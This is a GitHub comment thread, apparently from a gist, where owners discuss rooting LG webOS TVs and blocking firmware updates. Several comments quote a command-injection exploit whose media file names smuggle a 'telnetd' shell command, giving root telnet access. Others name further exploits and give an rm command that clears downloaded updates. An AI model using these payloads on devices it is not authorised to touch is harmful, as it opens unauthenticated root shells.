  3. Load onto a USB stick and plug into the back of your TV
  4. telnet <tv_ip_address>
  5. Profit ✅

@wes1993
Copy link

wes1993 commented Apr 24, 2024

Hello, did somenone know if i can safely remove this two videos that use 600MB of memory (I have read that on a 2018 model it could be possible but I ask just to be sure because my model is 2021)?
image

Thanks a lot
Stefano

@throwaway96
Copy link
Author

@wes1993

Yeah, it's fine unless you plan to put it in store mode and have it play the demo videos in the future.

@wes1993
Copy link

wes1993 commented Apr 25, 2024

Thanks a lot for your fast reply @throwaway96,
If for some reason I erroneously put the TV in store mode what happen? Just an error or bootloop/etc?

@FPSUsername
Copy link

Just like @luisan1977 , my TV (LG UN7300) running WebOS 5.5.0 gets the issue that jail_app.conf isn't writeable (chmod 644).

It's not worth releasing a workaround, as the only models that haven't received patches removing clouduploadd have other vulnerabilities that do not require Dev Mode.

What other methods are available for rooting? Rootmytv shows that 5.4.0 and above are patched. Opening the TV to access the eeprom is quite the task.

@sdroamt0
Copy link

sdroamt0 commented May 2, 2024

  1. Create an empty mp3 called myaud_$(telnetd$IFS-lsh).mp3
  2. Create a file with content 0xFFFE0000 and file name myaud_$(telnetd$IFS-lsh).lrc
  3. Load onto a USB stick and plug into the back of your TV
  4. telnet <tv_ip_address>
  5. Profit ✅

Thanks,

On my tv I had to:
3.1. Try to play myaud_$(telnetd$IFS-lsh).mp3 from usb stick ( that give error but run telnetd :) )
Simple, easy, clean...WONDERFUL ;)

Many thanks @jacobcxdev

@Rutge-R
Copy link

Rutge-R commented May 4, 2024

  1. Create an empty mp3 called myaud_$(telnetd$IFS-lsh).mp3
  2. Create a file with content 0xFFFE0000 and file name myaud_$(telnetd$IFS-lsh).lrc
  3. Load onto a USB stick and plug into the back of your TV
  4. telnet <tv_ip_address>
  5. Profit ✅

Good find! You figured this out? On what WebOS versions it's working?

@luisan1977
Copy link

  1. Create an empty mp3 called myaud_$(telnetd$IFS-lsh).mp3
  2. Create a file with content 0xFFFE0000 and file name myaud_$(telnetd$IFS-lsh).lrc
  3. Load onto a USB stick and plug into the back of your TV
  4. telnet <tv_ip_address>
  5. Profit ✅

Good find! You figured this out? On what WebOS versions it's working?

Same question. Is it working on patches versions?

@team-orangeBlue
Copy link

team-orangeBlue commented Jun 14, 2024

Is there a way to preserve root somehow in a better way?

My W21O updated 03.00.60->03.40.87 and destroyed the elevated webOSbrew app.
I'm now out of reach for every exploit out there (crashd, wta and whatever else is publicly disclosed - maybe anything for 03.40.87?).

Can't we like make a "run telnetd" script and set the SUID flag (so that it runs as root), then place it somewhere so that both devmode can access the file and it doesnt make any problems while being update-persistent?
Or maybe fake the AccessUSBs if that's feasible - have we ever had a chance to look at one in working order?

@throwaway96
Copy link
Author

@team-orangeBlue

If you used RootMyTV v1 and didn't remove the modified start-devmode.sh, updating to firmware that checks its signature will cause dev mode apps to be wiped. Otherwise, firmware updates have so far not affected dev mode/root. (Updating is still not recommended though.)

All writable filesystems are mounted nosuid. AccessUSB uses public key cryptography (specifically, RSA). Somebody made an emulated one, but that only worked because they already had root to replace the public key on the TV. I am not aware of anyone who has gotten hold of a legit AccessUSB.

Did you read the note at the top of the guide?

@team-orangeBlue
Copy link

No, I was lazy to test. My apologies.
dejavuln surprisingly exploited the TV and got root. Powerful indeed, thank you for the suggestion!

On 03.00.60 I used WTA to run telnet. It was easiest.
As for nosuid, sucks. As if that's by design.
Hopefully LG TVs become popular enough to get the attention equivalent to the ones of the PS3 jigs back in the day.

@robyevolution
Copy link

Hi, I have an OLED55CS6LA already rooted (firmware 04.40.90) if I update to webos23 (13.30.56) will I lose the root?

@Majkysek
Copy link

Majkysek commented Jul 5, 2024

Webos 23 (13.30.56) is still rootable with DejaVuln

@luisan1977
Copy link

@jacobcxdev thanks so much for your reply, 2 moths ago I forgot turn off the automatically updates and my LG received the last version patched 4.50.90, before I was in 4.50.56, I am totally stupid, :(...

Anyway thanks again.

@jacobcxdev
Copy link

@luisan1977 eek, sorry I didn't see this earlier to remind you in time :P let's hope LG mess up again! 🤞

@yecarrillo
Copy link

I'm putting this information here that may be useful to someone:
If you forgot to block updates and interrupted the update download (probably by cutting off the power), it is still possible to prevent the update from being installed by deleting the downloaded files. I didn't manage to take a screenshot of the message that appears on the TV.

This directory must be empty to prevent an update message from appearing on the TV:

ls -lt /mnt/lg/cmn_data/swupdate/

-rw-r--r-- 1 root root 112389 May 11 17:59 Package_Update_Info.xml
-rw-r--r-- 1 root root 112389 May 11 17:59 Package_Update_Info.xml.backup
-rw-r--r-- 1 root root 401 Apr 16 20:08 Image_Update_Info.xml
-rw-r--r-- 1 root root 401 Apr 16 20:08 Image_Update_Info.xml.backup

Deleting files in the folder:
rm -f /mnt/lg/cmn_data/swupdate/*

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment